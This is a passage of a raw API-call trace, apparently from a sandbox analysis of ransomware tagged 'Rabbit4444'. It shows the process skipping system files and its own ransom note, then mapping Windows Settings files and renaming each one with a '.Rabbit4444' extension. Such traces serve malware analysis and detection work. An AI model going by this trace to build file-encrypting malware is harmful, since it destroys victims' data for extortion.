[0059.309] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.309] lstrlenW (lpString=".dll") returned 4 [0059.309] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.309] lstrlenW (lpString=".lnk") returned 4 [0059.309] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.309] lstrlenW (lpString=".ini") returned 4 [0059.309] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.309] lstrlenW (lpString=".sys") returned 4 [0059.310] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.310] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{a73dcdb5-e233-4fc2-8083-6e431939002a}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.310] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.310] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15062064984) returned 1 [0059.310] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1149) returned 1 [0059.310] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0059.310] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0059.310] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x780, lpName=0x0) returned 0x298 [0059.311] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x780) returned 0x70000 [0059.312] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.312] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.312] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.312] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.312] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.312] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.312] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.312] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.312] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15062323706) returned 1 [0059.313] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0059.313] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0059.313] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.313] CloseHandle (hObject=0x298) returned 1 [0059.313] CloseHandle (hObject=0x278) returned 1 [0059.313] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms.Rabbit4444") returned 192 [0059.313] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{a73dcdb5-e233-4fc2-8083-6e431939002a}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{a73dcdb5-e233-4fc2-8083-6e431939002a}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.314] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54a80042, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x54a80042, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x232db48a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms", cAlternateFileName="CL2E6F~1.SET")) returned 1 [0059.314] lstrcmpiW (lpString1="Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.314] lstrcmpiW (lpString1="Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.314] lstrcmpiW (lpString1="Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.314] lstrcmpiW (lpString1="Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms", lpString2=".") returned 1 [0059.314] lstrcmpiW (lpString1="Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms", lpString2="..") returned 1 [0059.314] lstrcmpiW (lpString1="Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms", lpString2="windows") returned -1 [0059.314] lstrcmpiW (lpString1="Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.314] lstrcmpiW (lpString1="Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.314] lstrcmpiW (lpString1="Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms", lpString2="boot") returned 1 [0059.314] lstrcmpiW (lpString1="Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.314] lstrcmpiW (lpString1="Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.314] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms" | out: lpString1="Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms") returned="Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms" [0059.314] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.315] lstrlenW (lpString="Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms") returned 64 [0059.315] lstrlenW (lpString="Rabbit4444") returned 10 [0059.315] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.315] lstrlenW (lpString=".dll") returned 4 [0059.315] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.315] lstrlenW (lpString=".lnk") returned 4 [0059.315] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.315] lstrlenW (lpString=".ini") returned 4 [0059.315] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.315] lstrlenW (lpString=".sys") returned 4 [0059.315] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.315] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.315] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.316] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15062628556) returned 1 [0059.316] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=858) returned 1 [0059.316] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0059.316] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0059.316] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x660, lpName=0x0) returned 0x298 [0059.317] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x660) returned 0x70000 [0059.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0059.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0059.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0059.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0059.318] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15062889185) returned 1 [0059.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0059.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0059.318] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.318] CloseHandle (hObject=0x298) returned 1 [0059.318] CloseHandle (hObject=0x278) returned 1 [0059.318] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms.Rabbit4444") returned 192 [0059.319] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.319] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54b18a02, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x54b18a02, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231aa1ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3bd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms", cAlternateFileName="CL8988~1.SET")) returned 1 [0059.319] lstrcmpiW (lpString1="Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.319] lstrcmpiW (lpString1="Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.319] lstrcmpiW (lpString1="Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.319] lstrcmpiW (lpString1="Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms", lpString2=".") returned 1 [0059.319] lstrcmpiW (lpString1="Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms", lpString2="..") returned 1 [0059.319] lstrcmpiW (lpString1="Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms", lpString2="windows") returned -1 [0059.320] lstrcmpiW (lpString1="Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.320] lstrcmpiW (lpString1="Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.320] lstrcmpiW (lpString1="Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms", lpString2="boot") returned 1 [0059.320] lstrcmpiW (lpString1="Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.320] lstrcmpiW (lpString1="Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.320] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms" | out: lpString1="Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms") returned="Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms" [0059.320] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.320] lstrlenW (lpString="Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms") returned 64 [0059.320] lstrlenW (lpString="Rabbit4444") returned 10 [0059.320] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.320] lstrlenW (lpString=".dll") returned 4 [0059.320] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.320] lstrlenW (lpString=".lnk") returned 4 [0059.320] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.320] lstrlenW (lpString=".ini") returned 4 [0059.320] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.320] lstrlenW (lpString=".sys") returned 4 [0059.320] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.320] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{aa9d2032-e8fb-4f8c-99c9-09f539aebd59}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.321] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.321] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15063136179) returned 1 [0059.321] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=957) returned 1 [0059.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0059.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0059.321] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c0, lpName=0x0) returned 0x298 [0059.325] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c0) returned 0x70000 [0059.325] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.325] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0059.325] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.326] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.326] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.326] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0059.326] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15063665397) returned 1 [0059.326] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0059.326] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0059.326] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.326] CloseHandle (hObject=0x298) returned 1 [0059.326] CloseHandle (hObject=0x278) returned 1 [0059.326] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms.Rabbit4444") returned 192 [0059.326] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{aa9d2032-e8fb-4f8c-99c9-09f539aebd59}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{aa9d2032-e8fb-4f8c-99c9-09f539aebd59}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.327] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54bb1326, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x54bb1326, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2328efd5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms", cAlternateFileName="CLD8B6~1.SET")) returned 1 [0059.327] lstrcmpiW (lpString1="Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.327] lstrcmpiW (lpString1="Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.327] lstrcmpiW (lpString1="Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.327] lstrcmpiW (lpString1="Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms", lpString2=".") returned 1 [0059.327] lstrcmpiW (lpString1="Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms", lpString2="..") returned 1 [0059.327] lstrcmpiW (lpString1="Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms", lpString2="windows") returned -1 [0059.327] lstrcmpiW (lpString1="Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.327] lstrcmpiW (lpString1="Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.327] lstrcmpiW (lpString1="Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms", lpString2="boot") returned 1 [0059.327] lstrcmpiW (lpString1="Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.327] lstrcmpiW (lpString1="Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.327] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms" | out: lpString1="Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms") returned="Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms" [0059.327] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.328] lstrlenW (lpString="Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms") returned 64 [0059.328] lstrlenW (lpString="Rabbit4444") returned 10 [0059.328] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.328] lstrlenW (lpString=".dll") returned 4 [0059.328] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.328] lstrlenW (lpString=".lnk") returned 4 [0059.328] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.328] lstrlenW (lpString=".ini") returned 4 [0059.328] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.328] lstrlenW (lpString=".sys") returned 4 [0059.328] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.328] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{aaca901f-e74f-4894-b074-f55059532853}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.328] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.328] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15063902423) returned 1 [0059.328] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1068) returned 1 [0059.328] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0059.328] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0059.328] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0059.330] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0059.331] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.331] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.331] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.331] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.331] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.331] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.331] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.331] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.331] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15064181856) returned 1 [0059.331] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0059.331] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0059.331] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.331] CloseHandle (hObject=0x298) returned 1 [0059.331] CloseHandle (hObject=0x278) returned 1 [0059.331] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: 